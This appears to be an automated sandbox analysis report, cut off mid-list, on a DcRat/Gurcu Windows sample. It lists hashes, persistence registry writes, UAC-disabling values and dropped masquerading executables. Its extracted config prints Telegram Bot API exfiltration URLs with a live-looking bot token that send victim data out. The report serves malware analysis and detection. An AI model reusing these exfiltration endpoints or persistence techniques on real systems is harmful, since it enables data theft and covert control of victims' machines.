Resubmissions
21-11-2024 22:31
241121-2fewhasrfn 10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 22:31
Behavioral task
behavioral1
Sample
59b9f54f927431d2cf31d3aa202a0843.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
59b9f54f927431d2cf31d3aa202a0843.exe
Resource
win10v2004-20241007-en
General
-
Target
59b9f54f927431d2cf31d3aa202a0843.exe
-
Size
2.2MB
-
MD5
59b9f54f927431d2cf31d3aa202a0843
-
SHA1
b23d214605133dc8e930f9a9d473c7c7622b4b56
-
SHA256
007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594
-
SHA512
89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8
-
SSDEEP
24576:9zyhnYISyKSBWpKCeCirC9CMz+052LEgPHQ944INbKK6uK5Ye6KBOO3op+kE9hk4:9zyt2DixLb4I5KKnK5zgdlKWky
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20GYHASOLS%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CWindowsRE%5Cfontdrvhost.ex
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20ee44a06e690425e9fc115dd2e629b02422993e11%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A24.326348
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Gurcu family
-
Modifies WinLogon for persistence 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\", \"C:\\Users\\Default User\\sysmon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\", \"C:\\Users\\Default User\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\", \"C:\\Users\\Default User\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\NetHood\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\", \"C:\\Users\\Public\\csrss.exe\", \"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\", \"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\", \"C:\\Windows\\appcompat\\Programs\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\", \"C:\\Users\\Default User\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3936 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3060 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3408 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1148 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2000 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4380 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4556 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4260 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4872 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 752 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1404 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3536 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3200 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3012 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3820 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4140 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 396 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2600 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4800 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4152 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1032 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3836 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4384 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2820 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4992 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1972 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1964 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3056 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4160 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4768 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2340 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4068 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2940 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2484 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4136 4292 schtasks.exe 82 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 4292 schtasks.exe 82 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontdrvhost.exe -
resource yara_rule behavioral2/memory/1176-1-0x0000000000160000-0x000000000038E000-memory.dmp dcrat behavioral2/files/0x0007000000023cab-41.dat dcrat behavioral2/files/0x000a000000023cc7-84.dat dcrat behavioral2/files/0x0009000000023ca1-92.dat dcrat behavioral2/files/0x000a000000023cc8-134.dat dcrat behavioral2/files/0x0009000000023cc9-164.dat dcrat behavioral2/files/0x000a000000023cc9-183.dat dcrat behavioral2/files/0x0009000000023cca-219.dat dcrat behavioral2/memory/1328-221-0x0000000000920000-0x0000000000B4E000-memory.dmp dcrat -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 59b9f54f927431d2cf31d3aa202a0843.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 59b9f54f927431d2cf31d3aa202a0843.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation fontdrvhost.exe -
Executes dropped EXE 1 IoCs
pid Process 1328 fontdrvhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default User\\sysmon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Public\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Public\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\59b9f54f927431d2cf31d3aa202a0843 = "\"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\Panther\\UnattendGC\\fontdrvhost.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\59b9f54f927431d2cf31d3aa202a0843 = "\"C:\\Recovery\\WindowsRE\\59b9f54f927431d2cf31d3aa202a0843.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\winlogon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\NetHood\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Admin\\NetHood\\csrss.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Media Player\\it-IT\\sppsvc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\Programs\\upfc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Users\\Default User\\sysmon.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\RuntimeBroker.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Configuration\\Registration\\spoolsv.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\Programs\\upfc.exe\"" 59b9f54f927431d2cf31d3aa202a0843.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 59b9f54f927431d2cf31d3aa202a0843.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 38 ipinfo.io 39 ipinfo.io -
Drops file in Program Files directory 26 IoCs
description ioc Process File created C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files\Windows Media Player\it-IT\RCXCC6D.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\RCXDF85.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\Windows Defender\es-ES\9e8d7a4ca61bd9 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\9e8d7a4ca61bd9 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\RCXD84D.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\RCXD85E.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\RCXE44D.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\9e8d7a4ca61bd9 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\RCXCE82.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\RCXDF96.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files\Windows Media Player\it-IT\0a1fd5f707cd16 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\f3b6ecef712a24 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files (x86)\Internet Explorer\en-US\cc11b995f2a76d 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files\Windows Media Player\it-IT\RCXCBDF.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files\Windows Media Player\it-IT\sppsvc.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\RCXCE81.tmp 